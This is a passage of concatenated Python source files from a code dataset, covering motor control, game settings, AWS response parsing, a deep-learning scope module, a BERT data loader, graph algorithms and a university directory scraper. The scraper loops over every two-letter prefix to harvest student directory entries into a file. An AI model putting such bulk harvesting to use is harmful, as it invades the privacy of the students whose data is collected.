These need to be UNBLOCKED to be found (right click -> properties -> unblock\n# This uses Python For DotNet NOT IronPython\n\nclr.AddReference(\"Thorlabs.MotionControl.TCube.DCServoCLI\") # TDC001 DLL\nclr.AddReference(\"Thorlabs.MotionControl.KCube.DCServoCLI\") # KDC101 DLL\nclr.AddReference(\"Thorlabs.MotionControl.DeviceManagerCLI\")\nclr.AddReference(\"Thorlabs.MotionControl.GenericMotorCLI\")\nclr.AddReference(\"Thorlabs.MotionControl.TCube.DCServoUI\")\nclr.AddReference(\"Thorlabs.MotionControl.GenericMotorCLI\")\nclr.AddReference(\"System\")\n\n# Import the namespaces as modules - they are going to look like these are invalid, but they aren't\n\nfrom Thorlabs.MotionControl.DeviceManagerCLI import DeviceManagerCLI\nfrom Thorlabs.MotionControl.TCube.DCServoCLI import TCubeDCServo # TDC001\nfrom Thorlabs.MotionControl.KCube.DCServoCLI import KCubeDCServo # KDC101\nfrom System import Decimal\n\n\n@contextlib.contextmanager\ndef connect_tdc001(serial_number, waveplate=False):\n device = None\n try:\n DeviceManagerCLI.BuildDeviceList()\n # Tell the device manager to get the list of all devices connected to the computer\n serial_numbers = DeviceManagerCLI.GetDeviceList(TCubeDCServo.DevicePrefix)\n # get available TCube DC Servos and check our serial number is correct\n if str(serial_number) not in serial_numbers:\n raise ValueError(\"Device is not connected.\")\n device = TCubeDCServo.CreateTCubeDCServo(str(serial_number))\n device.Connect(str(serial_number))\n device.WaitForSettingsInitialized(5000)\n if not device.IsSettingsInitialized():\n raise ValueError(\"Device initialization timeout\")\n device.LoadMotorConfiguration(str(serial_number))\n device.StartPolling(250)\n device.EnableDevice()\n motorSettings = device.LoadMotorConfiguration(str(serial_number))\n currentDeviceSettings = device.MotorDeviceSettings\n if waveplate:\n yield WaveplateController(device)\n else:\n yield PolarizerController(device)\n finally:\n if device:\n device.Disconnect()\n else:\n print('TDC101 waveplate controller communication error')\n raise ValueError\n\n\n@contextlib.contextmanager\ndef connect_kdc101(serial_number, waveplate=True):\n device = None\n try:\n DeviceManagerCLI.BuildDeviceList() # Tell the device manager to get the list of all devices connected to the computer\n serial_numbers = DeviceManagerCLI.GetDeviceList(KCubeDCServo.DevicePrefix)\n # get available KCube Servos and check our serial number is correct\n if str(serial_number) not in serial_numbers:\n raise ValueError(\"Device is not connected.\")\n device = KCubeDCServo.CreateKCubeDCServo(str(serial_number))\n device.Connect(str(serial_number))\n device.WaitForSettingsInitialized(5000)\n if not device.IsSettingsInitialized():\n raise ValueError(\"Device initialization timeout\")\n device.LoadMotorConfiguration(str(serial_number))\n device.StartPolling(250)\n device.EnableDevice()\n motorSettings = device.LoadMotorConfiguration(str(serial_number)) # This is important to leave in, but I'm not sure\n # why\n currentDeviceSettings = device.MotorDeviceSettings # This is important to leave in, but I'm not sure why\n if waveplate:\n yield WaveplateController(device)\n else:\n yield PolarizerController(device)\n finally:\n if device:\n device.Disconnect()\n else:\n print('KDC101 waveplate controller communication error')\n raise ValueError\n\nclass RotatorMountController:\n def __init__(self, device):\n self._device = device\n\n def read_position(self, wait_ms=0):\n time.sleep(wait_ms/1000)\n position = float(str(self._device.Position))\n return 
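# --- Editor's aside (illustrative usage sketch; the serial number below is
# hypothetical, and real use requires the Thorlabs Kinesis DLLs) ---
# Both connect_* helpers are @contextlib.contextmanager generators: setup runs
# up to the `yield`, the controller object is bound by `with ... as`, and the
# finally-block guarantees device.Disconnect() even if the body raises.
#
#   from optics.hardware_control import polarizercontroller
#
#   with polarizercontroller.connect_kdc101(27000001, waveplate=True) as wp:
#       wp.home()
#       wp.move(45.0)
#       print(wp.read_polarization(wait_ms=250))
#   # the device is disconnected here, on success or failure
# --- end aside ---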
position\n\n def home(self):\n self._device.Home(self._device.InitializeWaitHandler())\n\n def move(self, position):\n while position > 360:\n position -= 360\n self._device.MoveTo(Decimal(position), self._device.InitializeWaitHandler())\n # this is a System.Decimal!\n\n\nclass WaveplateController(RotatorMountController):\n def __init__(self, device):\n self._device = device\n super().__init__(self._device)\n\n def move_nearest(self, position):\n current_position = self.read_position()\n i = 0\n for i in range(180):\n if position % 90 - 0.5 < (current_position + i) % 90 < position % 90 + 0.5:\n break\n self.move(current_position + i)\n\n def read_polarization(self, wait_ms=0):\n return self.read_position(wait_ms) * 2\n\n\nclass PolarizerController(RotatorMountController):\n def __init__(self, device):\n self._device = device\n super().__init__(self._device)\n self._polarizer_offset = polarizer_offset\n\n def move(self, position):\n calibrated_position = self._polarizer_offset * position # There is an offset of around 1.183 times the value\n # due to slipping of the CR1Z6 mount\n # This should be changed once a new motor is purchased\n self._device.MoveTo(Decimal(calibrated_position), self._device.InitializeWaitHandler())\n # this is a System.Decimal!\n\n def move_nearest(self, position):\n calibrated_position = self._polarizer_offset * position\n current_position = float(str(self._device.Position))\n if position in (0, 45):\n if calibrated_position - 1.1 < current_position % (90 * self._polarizer_offset) < calibrated_position + 1.1:\n return None\n for i in range(180):\n if calibrated_position - 1.1 < (current_position + i) % (90 * self._polarizer_offset) \\\n < calibrated_position + 1.1:\n break\n else:\n if calibrated_position - 1.1 < current_position % (180 * self._polarizer_offset) \\\n < calibrated_position + 1.1:\n return None\n for i in range(180):\n if calibrated_position - 1.1 < (current_position + i) % (180 * self._polarizer_offset) \\\n < calibrated_position + 1.1:\n break\n #self._device.MoveRelative(MotorDirection.Forward, Decimal(i), self._device.InitializeWaitHandler())\n new_position = current_position + i\n self._device.MoveTo(Decimal(new_position), self._device.InitializeWaitHandler())\n # this is a System.Decimal!\n\n def read_polarization(self, wait_ms=0):\n return self.read_position(wait_ms) / self._polarizer_offset\n\n","sub_path":"optics/hardware_control/polarizercontroller.py","file_name":"polarizercontroller.py","file_ext":"py","file_size_in_byte":6982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"546976473","text":"class Settings:\n \"\"\"Class intended to store all of the game's settings.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the game's settings.\"\"\"\n # Screen settings.\n self.screen_width = 1200\n self.screen_height = 800\n self.bg_color = (130, 110, 250)\n self.fullscreen = 0\n self.sky_speed = 1.9\n\n # Ship settings.\n self.ship_limit = 3\n\n 
# Bullet settings.\n self.bullet_width = 4\n self.bullet_height = 67\n self.bullet_color = (50, 255, 50)\n self.bullets_allowed = 6\n\n # Alien settings.\n self.alien_fleet_drop_speed = 10\n\n # Easy adjustment of the game's speed.\n self.speedup_scale = 1.1\n\n # Easy adjustment of the number of points awarded for shooting down an alien.\n self.score_scale = 1.5\n\n self.initialize_dynamic_settings()\n\n def initialize_dynamic_settings(self):\n \"\"\"Initialize settings that change during the game.\"\"\"\n self.ship_speed = 2.5\n self.bullet_speed = 4.5\n self.alien_speed = 0.5\n\n # A fleet_direction value of 1 means movement to the right, -1 to the left.\n self.fleet_direction = 1\n\n # Scoring.\n self.alien_points = 50\n\n def increase_speed(self):\n \"\"\"Change the speed-related settings.\"\"\"\n self.ship_speed *= self.speedup_scale\n self.bullet_speed *= self.speedup_scale\n self.alien_speed *= self.speedup_scale\n\n self.alien_points = int(self.alien_points * self.score_scale)\n print(self.alien_points)","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"334818958","text":"import datetime\nfrom dateutil.parser import parse\nfrom dateutil.tz import tzutc\n\n# Handling AWS Boto responses which have Dict + List + Dict to unwrap a value\n# You have to handle the KeyError risk\n\n# Dict - aws_iam_response\n# List[0] - aws_iam_response['AccessKeyMetadata']\n# List[0] - Dict of data\n\naws_iam_response = {'AccessKeyMetadata': [{\n 'UserName': 'foobar',\n 'AccessKeyId': 'AKIAV2V7NSN7XXXXXXX',\n 'Status': 'Active',\n 'CreateDate': datetime.datetime(2021, 2, 13, 7, 2, 8, tzinfo=tzutc())}],\n 'IsTruncated': False,\n 'ResponseMetadata':\n {'RequestId': 'aaaaaaaa-aaaa-aaaa-aaaa-ffffffffffff',\n 'HTTPStatusCode': 200,\n 'HTTPHeaders':\n {'x-amzn-requestid': 'aaaaaaaa-aaaa-aaaa-aaaa-ffffffffffff',\n 'content-type': 'text/xml',\n 'content-length': '554',\n 'date': 'Wed, 12 May 2021 15:23:30 GMT'},\n 'RetryAttempts': 0}}\n\n\ndef validate_date_return_pretty(date_text):\n cleaned_date = parse(date_text)\n return f'{cleaned_date:%d-%m-%Y\\t%H:%M%p}'\n\n\n# Parse response\nfor key, value in aws_iam_response.items():\n if isinstance(value, list):\n dict_of_active_keyid = value[0]\n access_key_id = dict_of_active_keyid.get('AccessKeyId', None)\n print(access_key_id)\n\n# Direct, without parsing response. High risk of KeyError\nprint(f'[*]AccessKeyId: \\t{aws_iam_response[\"AccessKeyMetadata\"][0][\"AccessKeyId\"]}')\n\n# Focused on removing KeyError risk\naccess_key_id = aws_iam_response.get(\"AccessKeyMetadata\", [{}])[0].get(\"AccessKeyId\", None)\nif access_key_id:\n print(f'[*]AccessKeyId: \\t{access_key_id}')\n","sub_path":"python/parse_dict.py","file_name":"parse_dict.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"343480236","text":"# ------------------------------------------------------------\n# Copyright (c) 2017-present, SeetaTech, Co.,Ltd.\n#\n# Licensed under the BSD 2-Clause License.\n# You should have received a copy of the BSD 2-Clause License\n# along with the software. 
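# --- Editor's aside (illustrative sketch; helper name hypothetical) ---
# A pattern that removes the KeyError/IndexError risk entirely when unwrapping
# Dict -> List -> Dict responses like the AWS example above is to give every
# hop a default:
def safe_first_key(response, list_key, item_key, default=None):
    """Walk dict -> list[0] -> dict without raising on missing pieces."""
    items = response.get(list_key) or [{}]  # missing or empty list -> one empty dict
    return items[0].get(item_key, default)

assert safe_first_key({}, "AccessKeyMetadata", "AccessKeyId") is None
# --- end aside ---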
If not, See,\n#\n# <https://opensource.org/licenses/BSD-2-Clause>\n#\n# ------------------------------------------------------------\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport threading\nimport dragon.import_c_api as _C\n\nfrom contextlib import contextmanager\n\n\n__all__ = [\n 'name_scope',\n 'phase_scope',\n 'device_scope',\n 'get_default_phase',\n 'get_default_device',\n 'get_default_name_scope',\n 'WorkspaceScope',\n]\n\n\nclass _ThreadLocalStack(threading.local):\n def __init__(self):\n super(_ThreadLocalStack, self).__init__()\n self._enforce_nesting = True\n self.stack = []\n\n def get_default(self):\n return self.stack[-1] if len(self.stack) >= 1 else None\n\n def is_cleared(self):\n return not self.stack\n\n @property\n def enforce_nesting(self):\n return self._enforce_nesting\n\n @enforce_nesting.setter\n def enforce_nesting(self, value):\n self._enforce_nesting = value\n\n @contextmanager\n def get_controller(self, default):\n \"\"\"A context manager for manipulating a default stack.\"\"\"\n self.stack.append(default)\n try:\n yield default\n finally:\n # stack may be empty if reset() was called\n if self.stack:\n if self._enforce_nesting:\n if self.stack[-1] is not default:\n raise AssertionError(\n \"Nesting violated for default stack of %s objects\" %\n type(default))\n self.stack.pop()\n else:\n self.stack.remove(default)\n\n\nclass WorkspaceScope(object):\n \"\"\"WorkspaceScope is an auxiliary to assign the specific workspace.\n\n Examples\n --------\n >>> import dragon as dg\n >>> with WorkspaceScope('session1'): pass\n >>> with dg.ws_scope('session2'): pass\n\n \"\"\"\n def __init__(self, ws_name):\n assert isinstance(ws_name, type('str')), \\\n 'WorkspaceScope takes in a string as its argument.'\n assert ws_name != '', \\\n 'The workspace name should not be empty.'\n self.ws = ws_name\n self.prev = 'default'\n\n def __enter__(self):\n self.prev = _C.CurrentWorkspace()\n _C.SwitchWorkspace(self.ws, True)\n\n def __exit__(self, type, value, traceback):\n _C.SwitchWorkspace(self.prev, True)\n\n\n_GLOBAL_TENSOR_STACK = _ThreadLocalStack()\n_GLOBAL_PHASE_STACK = _ThreadLocalStack()\n_GLOBAL_DEVICE_STACK = _ThreadLocalStack()\n_PREDEFINED_SCOPE_SEPARATOR = '/'\n\n\ndef name_scope(name):\n \"\"\"Nest the specified name for naming tensors.\n\n Parameters\n ----------\n name : str\n The name to add to the tensors.\n\n Returns\n -------\n str\n The current nesting prefix.\n\n Examples\n --------\n >>> import dragon\n >>> with dragon.name_scope('conv1'): a = dragon.Tensor('weights')\n >>> a.name\n >>> \"conv1/weights\"\n\n \"\"\"\n if name != '': prefix = name + _PREDEFINED_SCOPE_SEPARATOR\n else: prefix = '' # Avoid duplicated separators\n default = get_default_name_scope() + prefix\n return _GLOBAL_TENSOR_STACK.get_controller(default)\n\n\ndef device_scope(device_type, device_id=0):\n \"\"\"Nest the specific device info.\n\n Parameters\n ----------\n device_type : {'cpu', 'gpu', 'cuda', 'cnml'}, required\n The type of device.\n device_id : int, optional\n The index of the device.\n\n \"\"\"\n device_type, device_id = device_type.lower(), device_id\n assert device_type in ['cpu', 'gpu', 'cuda', 'cnml']\n # Default names\n if device_type == 'gpu': device_type = 'cuda'\n return _GLOBAL_DEVICE_STACK.get_controller({\n 'device_type': device_type,\n 'device_id': device_id})\n\n\ndef phase_scope(phase):\n \"\"\"Nest the specific phase.\n\n Parameters\n ----------\n phase : {'TRAIN', 'TEST'}, required\n The phase.\n\n Returns\n -------\n str\n 
\n\ndef phase_scope(phase):\n \"\"\"Nest the specific phase.\n\n Parameters\n ----------\n phase : {'TRAIN', 'TEST'}, required\n The phase.\n\n Returns\n -------\n str\n The specified phase.\n\n Examples\n --------\n >>> import dragon\n >>> a = dragon.ops.RandomUniform([2, 3])\n >>> with dragon.phase_scope(phase='TEST'): f_eval = dragon.function(outputs=a)\n\n \"\"\"\n phase = phase.upper()\n assert phase in ('TRAIN', 'TEST'), \\\n \"Specified an unknown phase: \" + phase\n return _GLOBAL_PHASE_STACK.get_controller(phase)\n\n\ndef get_default_name_scope():\n \"\"\"Return the name scope in current nesting.\n\n Returns\n -------\n str\n The name scope.\n\n \"\"\"\n ret = _GLOBAL_TENSOR_STACK.get_default()\n return ret if ret is not None else ''\n\n\ndef get_default_phase():\n \"\"\"Return the phase in current nesting.\n\n Returns\n -------\n str or None\n The phase.\n\n \"\"\"\n return _GLOBAL_PHASE_STACK.get_default()\n\n\ndef get_default_device():\n \"\"\"Return the device dict in current nesting.\n\n The device dict contains the following keys:\n\n (``device_type``, ``device_id``).\n\n Returns\n -------\n dict\n The device dict.\n\n \"\"\"\n return _GLOBAL_DEVICE_STACK.get_default()","sub_path":"Dragon/python/dragon/core/scope.py","file_name":"scope.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"414391715","text":"\"\"\"Module with implementation of Graph Traversal.\"\"\"\nfrom queue import Queue\nfrom stack import Stack\n
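\n# Note (added): 'queue' and 'stack' are assumed to be this project's local\n# modules; they expose head/enqueue/dequeue and top/push/pop used below,\n# unlike the standard-library 'queue'.\n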
\n\nclass Graph(object):\n \"\"\"Implementation of Graph Traversal.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize an empty graph.\"\"\"\n self.node_dict = {}\n\n def nodes(self):\n \"\"\"Return a list of all nodes in the graph.\"\"\"\n return list(self.node_dict.keys())\n\n def edges(self):\n \"\"\"Return a list of all edges in the graph.\"\"\"\n edge_list = []\n for node1 in self.node_dict:\n for node2 in self.node_dict[node1]:\n edge_list.append((node1, node2))\n return edge_list\n\n def add_node(self, n):\n \"\"\"Add a node 'n' to the graph.\"\"\"\n self.node_dict.setdefault(n, [])\n\n def add_edge(self, n1, n2):\n \"\"\"Add an edge to the graph with source, dest of 'n1', 'n2'. Add node if either not present.\"\"\"\n self.add_node(n1)\n self.add_node(n2)\n if n2 in self.node_dict[n1]:\n raise ValueError(\"Edge already exists\")\n self.node_dict[n1].append(n2)\n\n def del_node(self, n):\n \"\"\"Delete the node 'n' from the graph. Raise error if no such node exists.\"\"\"\n if n in self.node_dict:\n del self.node_dict[n]\n for node in self.node_dict:\n try:\n self.del_edge(node, n)\n except KeyError:\n pass\n else:\n raise KeyError(\"Cannot remove node that does not exist.\")\n\n def del_edge(self, n1, n2):\n \"\"\"Delete edge from 'n1' to 'n2'. Raise error if no such edge exists.\"\"\"\n if n1 in self.node_dict and n2 in self.node_dict[n1]:\n self.node_dict[n1].remove(n2)\n else:\n raise KeyError(\"Cannot remove edge that does not exist.\")\n\n def has_node(self, n):\n \"\"\"True or False based on whether node 'n' is present in the graph.\"\"\"\n return n in self.node_dict\n\n def neighbors(self, n):\n \"\"\"Return the list of all nodes connected to 'n' by edges. Raise error if n is not present.\"\"\"\n if n not in self.node_dict:\n raise KeyError(\"Cannot return neighbors of node that does not exist.\")\n return self.node_dict[n]\n\n def adjacent(self, n1, n2):\n \"\"\"Return True/False based on whether an edge connects 'n1' and 'n2'. Raises error if either node is not present.\"\"\"\n if n1 in self.node_dict and n2 in self.node_dict:\n return n2 in self.node_dict[n1]\n raise KeyError(\"Nodes not in graph!\")\n\n def depth_first_traversal(self, start, track=None):\n \"\"\"Graph traversal depth first.\"\"\"\n res = [start]\n if track is None:\n track = set()\n track.add(start)\n try:\n for n in self.node_dict[start]:\n if n not in track:\n res += self.depth_first_traversal(n, track)\n except KeyError:\n raise KeyError(str(start) + ' not in graph')\n return res\n\n def breadth_first_traversal(self, start):\n \"\"\"Breadth version of graph traversal.\"\"\"\n try:\n res = []\n queue = Queue([start])\n track = set()\n while queue.head:\n cur_node = queue.dequeue()\n if cur_node not in track:\n res.append(cur_node)\n track.add(cur_node)\n for child in self.node_dict[cur_node]:\n queue.enqueue(child)\n except KeyError:\n raise KeyError(str(start) + ' not in graph')\n return res\n\n def depth_first_traversal_iterative(self, start):\n \"\"\"Iterative depth version of graph traversal.\"\"\"\n try:\n res = []\n stack = Stack([start])\n track = set()\n while stack.top:\n cur_node = stack.pop()\n if cur_node not in track:\n res.append(cur_node)\n track.add(cur_node)\n for child in self.node_dict[cur_node][::-1]:\n stack.push(child)\n except KeyError:\n raise KeyError(str(start) + ' not in graph')\n return res\n\n\nif __name__ == '__main__': # pragma: no cover\n import timeit\n import random\n from pprint import pprint\n\n graph = Graph()\n for i in range(100):\n try:\n graph.add_edge(random.randint(0, 20), random.randint(0, 20))\n except ValueError:\n pass\n start = random.choice(graph.nodes())\n\n pprint(graph.node_dict)\n\n depth = timeit.timeit(\n stmt=\"graph.depth_first_traversal(start)\",\n setup=\"from __main__ import graph, start\",\n number=1000,\n )\n depth_i = timeit.timeit(\n stmt=\"graph.depth_first_traversal_iterative(start)\",\n setup=\"from __main__ import graph, start\",\n number=1000,\n )\n breadth = timeit.timeit(\n stmt=\"graph.breadth_first_traversal(start)\",\n setup=\"from __main__ import graph, start\",\n number=1000,\n )\n print('\\n1000 recursive depth first traversals:\\n\\t{} seconds\\n'.format(depth) +\n '\\tPath: {}\\n'.format(graph.depth_first_traversal(start)) +\n '\\n1000 iterative depth first traversals:\\n\\t{} seconds\\n'.format(depth_i) +\n '\\tPath: {}\\n'.format(graph.depth_first_traversal_iterative(start)) +\n '\\n1000 breadth first traversals:\\n\\t{} seconds\\n'.format(breadth) +\n '\\tPath: {}\\n'.format(graph.breadth_first_traversal(start)))\n","sub_path":"src/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"245594324","text":"import numpy as np\nimport pandas as pd\nimport re\nfrom transformers import BertTokenizer, BertModel\nfrom config import config\n\npretrained_weights = config.pretrained_weights\ntokenizer = BertTokenizer.from_pretrained(pretrained_weights)\nspecial_tokens_dict = {'additional_special_tokens': [\"$\", \"#\"]}\nprint(tokenizer.SPECIAL_TOKENS_ATTRIBUTES)\n# Add the special tokens so the tokenizer will not split them; used as markers\ntokenizer.add_special_tokens(special_tokens_dict)\nprint(tokenizer.additional_special_tokens)\nprint(tokenizer.additional_special_tokens_ids)\nprint(tokenizer.sep_token)\nprint(tokenizer.sep_token_id)\nprint(tokenizer.cls_token_id)\nprint(tokenizer.cls_token)\nprint(tokenizer.pad_token_id)\nprint(tokenizer.mask_token) # [MASK]\nprint(tokenizer.mask_token_id) # 103\n
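\n# Note (added): '$' and '#' registered above stay single tokens and are used\n# below to mark the e1/e2 entity boundaries in each sentence.\n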
\n\n# Text relation -> label; 19 classes\nclass2label = {'Other': 0,\n 'Message-Topic(e1,e2)': 1, 'Message-Topic(e2,e1)': 2,\n 'Product-Producer(e1,e2)': 3, 'Product-Producer(e2,e1)': 4,\n 'Instrument-Agency(e1,e2)': 5, 'Instrument-Agency(e2,e1)': 6,\n 'Entity-Destination(e1,e2)': 7, 'Entity-Destination(e2,e1)': 8,\n 'Cause-Effect(e1,e2)': 9, 'Cause-Effect(e2,e1)': 10,\n 'Component-Whole(e1,e2)': 11, 'Component-Whole(e2,e1)': 12,\n 'Entity-Origin(e1,e2)': 13, 'Entity-Origin(e2,e1)': 14,\n 'Member-Collection(e1,e2)': 15, 'Member-Collection(e2,e1)': 16,\n 'Content-Container(e1,e2)': 17, 'Content-Container(e2,e1)': 18}\n\n# Label -> text relation\nlabel2class = {0: 'Other',\n 1: 'Message-Topic(e1,e2)', 2: 'Message-Topic(e2,e1)',\n 3: 'Product-Producer(e1,e2)', 4: 'Product-Producer(e2,e1)',\n 5: 'Instrument-Agency(e1,e2)', 6: 'Instrument-Agency(e2,e1)',\n 7: 'Entity-Destination(e1,e2)', 8: 'Entity-Destination(e2,e1)',\n 9: 'Cause-Effect(e1,e2)', 10: 'Cause-Effect(e2,e1)',\n 11: 'Component-Whole(e1,e2)', 12: 'Component-Whole(e2,e1)',\n 13: 'Entity-Origin(e1,e2)', 14: 'Entity-Origin(e2,e1)',\n 15: 'Member-Collection(e1,e2)', 16: 'Member-Collection(e2,e1)',\n 17: 'Content-Container(e1,e2)', 18: 'Content-Container(e2,e1)'}\n\n\ndef clean_str(text):\n text = text.lower()\n # Clean the text\n text = re.sub(r\"[^A-Za-z0-9^,!.\\/'+-=$#]\", \" \", text)\n text = re.sub(r\"what's\", \"what is \", text)\n text = re.sub(r\"that's\", \"that is \", text)\n text = re.sub(r\"there's\", \"there is \", text)\n text = re.sub(r\"it's\", \"it is \", text)\n text = re.sub(r\"\\'s\", \" \", text)\n text = re.sub(r\"\\'ve\", \" have \", text)\n text = re.sub(r\"can't\", \"can not \", text)\n text = re.sub(r\"n't\", \" not \", text)\n text = re.sub(r\"i'm\", \"i am \", text)\n text = re.sub(r\"\\'re\", \" are \", text)\n text = re.sub(r\"\\'d\", \" would \", text)\n text = re.sub(r\"\\'ll\", \" will \", text)\n text = re.sub(r\",\", \" \", text)\n text = re.sub(r\"\\.\", \" \", text)\n text = re.sub(r\"!\", \" ! \", text)\n text = re.sub(r\"\\/\", \" \", text)\n text = re.sub(r\"\\^\", \" ^ \", text)\n text = re.sub(r\"\\+\", \" + \", text)\n text = re.sub(r\"\\-\", \" - \", text)\n text = re.sub(r\"\\=\", \" = \", text)\n text = re.sub(r\"'\", \" \", text)\n text = re.sub(r\"(\\d+)(k)\", r\"\\g<1>000\", text)\n text = re.sub(r\":\", \" : \", text)\n text = re.sub(r\" e g \", \" eg \", text)\n text = re.sub(r\" b g \", \" bg \", text)\n text = re.sub(r\" u s \", \" american \", text)\n text = re.sub(r\"\\0s\", \"0\", text) # ?\n text = re.sub(r\" 9 11 \", \"911\", text)\n text = re.sub(r\"e - mail\", \"email\", text)\n text = re.sub(r\"j k\", \"jk\", text)\n text = re.sub(r\"\\s{2,}\", \" \", text) # ?\n\n return text.strip()\n\n\ndef load_data_and_labels(path):\n data = []\n lines = [line.strip() for line in open(path)]\n max_sentence_length = 0\n labels = [] # labels\n for idx in range(0, len(lines), 4): # process each sentence\n id = lines[idx].split(\"\\t\")[0]\n relation = lines[idx + 1]\n\n sentence = lines[idx].split(\"\\t\")[1][1:-1]\n # Remove any pre-existing # and $; these symbols are assumed not to change the sentence meaning\n sentence = sentence.replace('#', '')\n sentence = sentence.replace('$', '')\n\n sentence = sentence.replace('<e1>', ' $ ')\n sentence = sentence.replace('</e1>', ' $ ')\n sentence = sentence.replace('<e2>', ' # ')\n sentence = sentence.replace('</e2>', ' # ')\n\n sentence = clean_str(sentence) # clean the sentence\n sentence = \"[CLS] \" + sentence + \" [SEP]\" # prepend [CLS] to the sentence; [CLS] or CLS ? [CLS]:101; CLS:101\n
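\n # Added illustration (hedged; made-up sample): after the replacements above,\n # '<e1>people</e1> moved into <e2>houses</e2>' becomes\n # '[CLS] $ people $ moved into # houses # [SEP]' before tokenization.\n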
\n tokens = tokenizer.tokenize(sentence)\n if max_sentence_length < len(tokens):\n max_sentence_length = len(tokens)\n\n data.append([id, sentence, relation])\n\n df = pd.DataFrame(data=data, columns=[\"id\", \"sentence\", \"relation\"])\n df['label'] = [class2label[r] for r in df['relation']]\n x_text = df['sentence'].tolist()\n y = df['label'].tolist()\n\n x_text = np.array(x_text)\n y = np.array(y)\n\n return x_text, y, max_sentence_length # data (sentences), labels\n\n\nif __name__ == \"__main__\":\n pass","sub_path":"mul_bert/bertRC_mALL_data_helps.py","file_name":"bertRC_mALL_data_helps.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559290297","text":"from urllib import request, parse\nfrom hiddenFieldParser import HiddenFieldParser\nimport searchParser\nimport http.cookiejar\nimport http.client\nimport string\nimport weblogin\nimport os\n\nheaders = {\n 'accept': \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n 'upgrade-insecure-requests': \"1\",\n 'user-agent': \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\",\n 'content-type': \"application/x-www-form-urlencoded\",\n 'accept-language': \"en-US,en;q=0.8,sl;q=0.6\",\n 'cache-control': \"no-cache\",\n}\n\nurl = \"https://www.washington.edu/home/peopledir/secure/\"\n\npubcookie_l = weblogin.requestPubCookieL()\npubcookie_g = weblogin.requestPubCookieG(url)\n\n# Add our pubcookie_l.\nheaders['cookie'] = pubcookie_l[0] + \"=\" + pubcookie_l[1]\n# Add our pubcookie_g.\nheaders['cookie'] += \"; \" + pubcookie_g[0] + \"=\" + pubcookie_g[1]\n\n# Prepare our body data.\nbody = {\n \"length\": \"sum\",\n \"method\": \"name\",\n \"whichdir\": \"student\"\n}\n\n# Returns True if the request was successful...\n# whatever that means.\ndef doSearch(parser, url, body, headers):\n body = parse.urlencode(body).encode(\"ascii\")\n req = request.Request(url, body, headers)\n response = request.urlopen(req)\n page = response.read().decode(\"utf-8\")\n parser.feed(page)\n if len(parser.data) != 0 or \"No matches for\" in page:\n return True\n else:\n return False\n\nf = open(\"students.txt\", \"w\")\nparser = searchParser.SearchParser()\nstudents = []\n# Iterate through every two-character string.\nfor i in string.ascii_lowercase:\n for j in string.ascii_lowercase:\n print(i + j)\n body['term'] = i + j\n # While the request is unsuccessful.\n while not doSearch(parser, url, body, headers):\n pubcookie_g = weblogin.requestPubCookieG(url)\n # Set our pubcookie_l.\n headers['cookie'] = pubcookie_l[0] + \"=\" + pubcookie_l[1]\n # Add our new pubcookie_g.\n headers['cookie'] += \"; \" + pubcookie_g[0] + \"=\" + pubcookie_g[1]\n\n for entry in parser.data:\n students.append(entry)\n parser = searchParser.SearchParser()\n\n# Remove duplicates.\nstudents = set(tuple(x) for x in students) \n\n# Sort by name.\nstudents = sorted(students, key = lambda student: student[0])\n\nfor entry in students:\n f.write(str(entry) + \"\\n\")\nf.close()\n","sub_path":"uwDirectory.py","file_name":"uwDirectory.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"541907438","text":"INF = int(1e9)\n\nn, m = map(int, input().split())\n\n# Create a 2D list and initialize every value to infinity\ngraph = [[INF] * (n + 1) for _ in range(n + 1)]\n\n# The cost from a node to itself is initialized to 0\nfor a in range(1, n + 1):\n for b in range(1, n + 1):\n if a == b:\n graph[a][b] = 0\n\n# Read each edge and initialize the graph with its value\nfor _ in range(m):\n # A and B are connected with cost 1\n a, b = map(int, input().split())\n graph[a][b] = 1\n graph[b][a] = 1\n\nx, k = map(int, input().split())\n\n# Sample input\n# 5 7\n# 1 2\n# 1 3\n# 1 4\n# 2 4\n# 3 4\n# 3 5\n# 4 5\n# 4 5\n\n
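# Note (added): 't' below is the intermediate vertex; it is kept distinct from\n# 'k', which already names the target city read above. Recurrence:\n# graph[a][b] = min(graph[a][b], graph[a][t] + graph[t][b]), O(n^3) overall.\n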
# Run the Floyd-Warshall algorithm following the recurrence relation\nfor t in range(1, n + 1):\n for a in range(1, n + 1):\n for b in range(1, n + 1):\n graph[a][b] = min(graph[a][b], graph[a][t] + graph[t][b])\n\ndistance = graph[1][k] + graph[k][x]\nprint(graph)\n\nif distance >= INF:\n print(-1)\nelse:\n print(distance)\n# Print the resulting matrix\n# for a in range(1, n + 1):\n# for b in range(1, n + 1):\n# # If unreachable, print INFINITY\n# if graph[a][b] == INF:\n# print(\"INFINITY\", end = \" \")\n# # Otherwise, print the distance\n# else:\n# print(graph[a][b], end=\" \")\n# print()\n","sub_path":"이것이 코딩 테스트다 - 연습문제/26. 미래 도시.py","file_name":"26. 미래 도시.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"8534958","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function, unicode_literals\n\nimport os\nimport re\nimport threading\nimport unittest\nfrom io import StringIO\n\nimport kivy\nfrom 